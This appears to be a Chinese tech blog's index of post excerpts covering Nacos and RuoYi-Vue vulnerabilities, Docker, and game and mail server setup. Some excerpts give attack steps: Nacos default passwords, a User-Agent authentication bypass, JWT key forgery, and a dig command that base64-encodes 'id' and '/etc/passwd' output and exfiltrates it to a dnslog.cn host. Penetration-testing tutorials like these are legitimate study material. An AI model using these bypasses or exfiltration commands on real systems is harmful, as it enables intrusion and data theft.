Nacos 环境搭建 https://github.com/alibaba/nacos 启动路径 nacos/nacos-2.3.2/bin 启动命令 1$ ./startup.sh -m standalone 默认端口号 8888 1.默认口令 访问http://ip:8848/nacos/#/login进入登陆页面 默认口令为nacos/nacos 2.浏览器代理身份绕过（nacos<1.4.1）​ 将User-Agent: 更改为 Nacos-Server 即可绕过身份认证 以下为用户查询接口 添加用户接口 POST /nacos/v1/auth/users?username=takake&password=123456 HTTP/1.1 3.JWT伪造身份绕过（0.1.0<=nacos<=2.2.0）3.1.原理 nacos通过jwt进行身份认证，由于配置文件中存在默认jwt签名密钥，由于开发者安全意 ...

1.nacos安装配置 在github官网下载：https://github.com/alibaba/nacos 将文件包解压 在bin中使用startup文件进行启动，需要java8+环境 默认以集群方式启动，单机启动命令： 1$ ./startup.sh -m standalone 配置授权token 123456nacos.core.auth.enabled=truenacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789nacos.core.auth.server.identity.key=adminnacos.core.auth.server.identity.value=admin123nacos.console.ui.enabled=true 2.nacos集成springboot 直接获取nacos中值 1234567891011121314151617 <parent& ...

1.简介 在很多时候我们拿到一个RCE漏洞时可能存在没有回显的利用链，那么在这时，就需要我们通过出网，将我们执行命令的结果外带出来，以此来观察执行命令的结果。 其中我们主要是通过输入“$(cmd)”可以将执行命令的结果以请求参数的形式外带出来。 2.外网dnslog获取dnslog https://dnslog.cn/ 1234567891011121314151617181920$ dig $(echo -n $(id) | base64 | head -c 63).g8mpq4.dnslog.cn# 命令解读， dig 解析域名 ，$() 调用返回结果作为参数调用，id 需要命令执行字符串，BASE64 将$(id)执行的结果进行BASE64编码，便于传输，head -c 63 只输出前0-63个字符，如果不足则全部输出# 如果说只需要取其中一段命令结果$ echo -n $(cat /etc/passwd) | base64 | head -c 127 | cut -c 64-# 这样就可以取到64到127的BASE64的字符串了，cut -c 64- 表示从第64个字符开始到 ...

1.简介 使用本地windows10系统+云服务器frp实现雾锁王国 (Enshrouded)联机服务及搭建。 本地服务器官方推荐配置6核16G 2.Win10安装steamcmd cd C:\steamcmd 下载steamcmd 解压后，双击安装 再次双击运行下载后的steamcmd.exe，验证更新 关闭命令终端 3.下载安装服务器 官方介绍 在当前目录打开cmd 运行命令steamcmd +login anonymous +app_update 2278520 validate +quit **cd C:\steamcmd\steamapps\common\EnshroudedServer ** 双击运行enshrouded_server.exe初始化服务器 关闭命令终端，打开当前目录初始化服务器新增文件enshrouded_server.json文件，可修改服务器启动参数 12345678910{ "name": "Enshrouded Server", "password": & ...

1.docker数据卷1.1.简介 实现宿主机和容器之间的文件或者文件的同步，一般用来解决容器的持久化存储或者是宿主机和容器之间的数据共享 1.2.操作 设置数据卷 12345678910111213141516# 绝对路径$ docker run -v 数据机目录:容器目录[读写权限] 镜像名# 别名 如果不存在对应数据卷，docker将自动创建$ docker run -v 数据卷: 容器目录[读写权限] 镜像名# eg:$ docker run -d -p 80:80 -v nginx_html:/usr/share/nginx/html nginx# 查看数据卷$ docker inspect 容器id# 列出数据卷$ docker volume ls# 查看数据卷详细信息$ docker volume inspect 容器名# 创建数据卷$ docker volume create 数据卷名# 删除数据卷 rm -f强制删除，但不能删除使用中的数据卷$ docker volume rm 数据卷名 2.Dockerfile2.1.简介 dockerfile可以用来定义镜像 ...

1.安装docker engine 非ubuntu其他系统安装docker官方手册 前置 1234567891011121314# 添加Docker官方GPG密钥:sudo apt-get updatesudo apt-get install ca-certificates curl gnupgsudo install -m 0755 -d /etc/apt/keyringscurl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpgsudo chmod a+r /etc/apt/keyrings/docker.gpg# 添加apt仓库源:echo \ "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu \ $(. /etc/ ...

1.安装steamcmd 请勿使用root安装steamcmd 当前系统ubuntu 20.04 server live 64位 12345678# 请使用非root用户安装# 我的64位ubuntu系统因此需要安装其余依赖，32位ubuntu可直接安装steamcmd 命令：sudo apt install steamcmd$ sudo add-apt-repository multiverse$ sudo dpkg --add-architecture i386$ sudo apt update$ sudo apt install lib32gcc-s1 steamcmd # 添加一个快捷方式$ ln -s /usr/games/steamcmd steamcmd 其他系统安装命令 运行steamcmd 12345# 因为我们创建了快捷方式，因此直接输入命令即可启动$ steamcmd# 页面出现 steamcmd>时表示已经进入了steamcmd的命令终端# 可以使用以下命令匿名登陆$ login anonymous 2.安装PalServer专用服务器 ...

1.开发测试环境搭建(审计环境)1.1.开发环境 RuiYi-Vue历史版本下载地址 安装IDEA 配置Maven 安装Mysql 创建数据库ry-vue 运行下载源码中的sql 获得如下表 修改连接数据库的用户名密码、路径 启动redis 启动后端环境 运行前端环境 安装nodejs 123$ cd ruoyi-ui$ npm install # 安装node_modules依赖$ npm run dev # 启动前端开发环境 2.历史漏洞2.1.任意文件下载2.1.1.低版本(<V-3.2.0)2.1.1.1.简介 该漏洞是由于在RuoYi-Vue低版本文件下载接口 /common/download/resource 中未对输入的路径做限制，导致可下载任意文件。 2.1.1.2.代码审计(V-3.0) 接口位置 com/ruoyi/web/controller/common/CommonController.java 文件下载默认路径ruoyi-admin\ ...

源代码下载 git项目地址 1. 域名解析​ 域名解析一共需要解析六条数据包括一条A记录，MX记录，和4条TXT记录 A记录，mail指向自己得服务器IP，NAME: mail ，CONTENT: <公网IP>（同时需要在VPS上配置rDNS，用于防止垃圾邮件过滤） MX记录 NAME: @ , CONTENT: <完整二级域名>，eg: mail.example.com 优先级为10 TXT SPF记录，NAME: @, CONTENT: v=spf1 mx -all TXT _dmarx记录， NAME: _dmarc CONTEXT: v=DMARC1; p=reject; adkim=s; aspf=s 证书TXT解析 acme-challenge.mail 记录，需要动态生成 NAME: _acme-challenge.mail , CONTENT: <动态生成>, eg: I9zcK5Us5ae6sUaxczP5GH9lHqiasoxvcJTGGckhQAw DKIM解析 ，NAME ...